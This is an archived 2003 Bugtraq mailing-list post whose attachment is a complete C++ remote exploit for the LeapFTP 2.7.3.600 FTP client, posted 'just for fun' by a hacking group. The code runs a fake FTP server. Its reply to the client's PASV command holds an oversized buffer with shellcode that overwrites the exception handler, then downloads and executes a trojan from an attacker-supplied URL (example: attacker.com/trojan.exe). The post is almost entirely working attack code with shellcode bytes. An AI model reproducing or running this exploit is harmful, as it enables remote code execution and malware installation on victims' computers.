[30701] in bugtraq
LeapFTP remote buffer overflow exploit
daemon@ATHENA.MIT.EDU (drG4njubas)
Fri Jul 11 15:41:19 2003
From: "drG4njubas" <drG4nj@mail.ru>
To: <bugtraq@securityfocus.com>
Date: Fri, 11 Jul 2003 22:47:01 +0400
Message-ID: <002401c347dc$d1b7d990$5b8b763e@user1>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0025_01C347FE.58C97990"
------=_NextPart_000_0025_01C347FE.58C97990
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: 7bit
Just for fun:)
Best Regards,
drG4njubas // DWC Security Group
Please visit: www.blacktigerz.org
------=_NextPart_000_0025_01C347FE.58C97990
Content-Type: application/octet-stream;
name="dwclftp273.cpp"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="dwclftp273.cpp"
/*
,--------------------------------------------.
; _________ ___ ___ ___ _________ ;=20
; /\ ___ \\ \ /\ \ /\ \\ _____\ ;=20
; \ \ \ \ \\ \ \ \ \ \\ \____/ ;
; \ \ \ \ \\ \ \ \ \ \\ \ ;
; \ \ \___\ \\ \__\ \__\ \\ \_____ ;=20
; \ \______ / \______________\\_______\ ; =20
; \/______/ \/______________//_______/ ;
; ;
`--------------------------------------------'
,--------------------------------------------.
; LeapFTP remote buffer overflow exploit ; =20
; by drG4njubas \\ DWC Group ;
`--------------------------------------------'
,--------------------------------------------.
;This exploit works against LeapFTP 2.7.3.600;
;running on windows 2000 SP3 russian edition.;
;Technical details: When LeapFTP requests IP ;
;and port by using PASV command if pasv mode ;
;is enabled, it causes the buffer overflow on;
;the stack area if server's reply for this ;=20
;PASV request has a long IP address: ;
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1);
;And this buffer overflow can overwrite a ;
;Structured Exception Handler on the stack ;
;area with an arbitrary value by specifying ;
;the address data over 1057 bytes. If this ;
;reply contains 0x29 and 0x2E bytes, an ;
;exception occurs before Structured Exception;
;Handler is overvritten and program continues;=20
;it's normal work. Thanks a lot to RaiSe for ;
;his wonderful shellcode. Greets fly to: ;
;areus, Over_G, subj, NeKr0, crx, nimber,;
;cydem group, zud team, DHGroup, GipsHack.;
`--------------------------------------------'
,--------------------------------------------.
; www.dwcgr0up.net ;
`--------------------------------------------'
*/
#include<winsock.h>
#include<stdio.h>
void main(int argc, char *argv[]){
printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
printf("; www.dwcgr0up.net ;\n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");
if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>\n");
printf("EXAMPLE : dwclft273.exe 21 =
http://www.attacker.com/trojan.exe\n");
return;
}
char exploit[] =3D
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B=
\xF7\x80"
=
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2=
\x04\xC1"
=
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2=
\x7C\x8B"
=
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8=
\x8B\x40"
=
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C=
\x03\x7D"
=
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B=
\xF8\x33"
=
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A=
\x03\x80"
=
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51=
\xF3\xA6"
=
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1=
\xE0\x02"
=
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40=
\x3C\x03"
=
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0=
\xAD\x03"
=
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC=
\x8D\x76"
=
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E=
\x74\x06"
=
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E=
\xEB\x02"
=
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D=
\xFC\x8D"
=
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45=
\xE4\xFC"
=
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43=
\xE2\xE1"
=
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53=
\x51\x53"
=
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43=
\xEB\xF9"
=
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4=
\xFF\xD0"
=
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF=
\xD0\x8D"
=
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52=
\x8D\x7B"
=
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6=
\x1F\xC1"
=
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B=
\x45\xB4"
=
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC=
\xFF\xD0"
=
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B=
\x55\xA4"
=
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC=
\xFF\xD0"
=
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F=
\x64\x75"
=
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32=
\x2d\x64"
=
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08=
\x4C\x6F"
=
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74=
\x08\x5F"
=
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63=
\x08\x5F"
=
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69=
\x74\x50"
=
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C=
\x08\x49"
=
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72=
\x6E\x65"
=
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74=
\x52\x65"
=
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F=
\x73\x65"
=
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65=
\x08\x68"
=
"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93=
\x93\x93"
=
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93=
\x93\x93"
=
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93=
\x93\x93"
=
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93=
\x93\x93"
=
"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25=
\x49\xE1"
=
"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE=
\x83\x25"
=
"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
=
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF=
\xFF\xFF"
=
"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34=
\xFF\xFF"
=
"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB=
\x37\xFF"
=
"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80=
\xAB\x3A"
=
"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03=
\x80\xAB"
=
"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF=
\x03\x80"
=
"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF=
\xFF\x03"
=
"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF=
\xFF\xFF"
=
"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48=
\xFF\xFF"
=
"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB=
\x4B\xFF"
=
"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80=
\xAB\x4E"
=
"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03=
\x80\xAB"
=
"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF=
\x03\x80"
=
"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF=
\xFF\x03"
=
"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF=
\xFF\xFF"
=
"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C=
\xFF\xFF"
=
"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB=
\x5F\xFF"
=
"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80=
\xAB\x62"
=
"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03=
\x80\xAB"
=
"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF=
\x03\x80"
=
"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF=
\xFF\x03"
=
"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF=
\xFF\xFF"
=
"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70=
\xFF\xFF"
=
"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB=
\x73\xFF"
=
"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80=
\xAB\x76"
=
"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03=
\x80\xAB"
=
"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF=
\x03\x80"
=
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF=
\xFF\x03"
=
"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82=
\x03\x90"
=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9=
\xFF\xFF";
=09
char *url =3D argv[2];
if(strlen(url)>80){
printf("ERROR: trojan url is too long!\n");
return;
}
for(unsigned int i =3D 5; i < strlen(url); i++){
url[i]+=3D3;
exploit[839+i] =3D url[i];
}
exploit[839+i] =3D '\x0B';
exploit[839+i+1] =3D '\x04';
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);
SOCKET listen_Sock =3D socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;
=09
addr_Sock.sin_family =3D AF_INET;
addr_Sock.sin_addr.s_addr =3D htonl(INADDR_ANY);
addr_Sock.sin_port =3D htons(atoi(argv[1]));
printf("Awaiting for connections...\n");
if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) =
return;
if(listen(listen_Sock, 1))return;
SOCKET victim =3D accept(listen_Sock,NULL,NULL);
printf("Victim connected...\n");
char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
send(victim, buffer, strlen(buffer), NULL);
=09
while(true){
if(recv(victim, buffer, 2048, NULL)=3D=3DSOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)=3D=3D0){
sprintf(buffer, "%s\r\n", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)=3D=3D0){
sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)=3D=3D0){
sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)=3D=3D0){
sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)=3D=3D0){
sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)=3D=3D0){
sprintf(buffer, "%s\r\n", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)=3D=3D0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.\n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.\n");
break;
}
=09
}
=09
closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}
------=_NextPart_000_0025_01C347FE.58C97990--
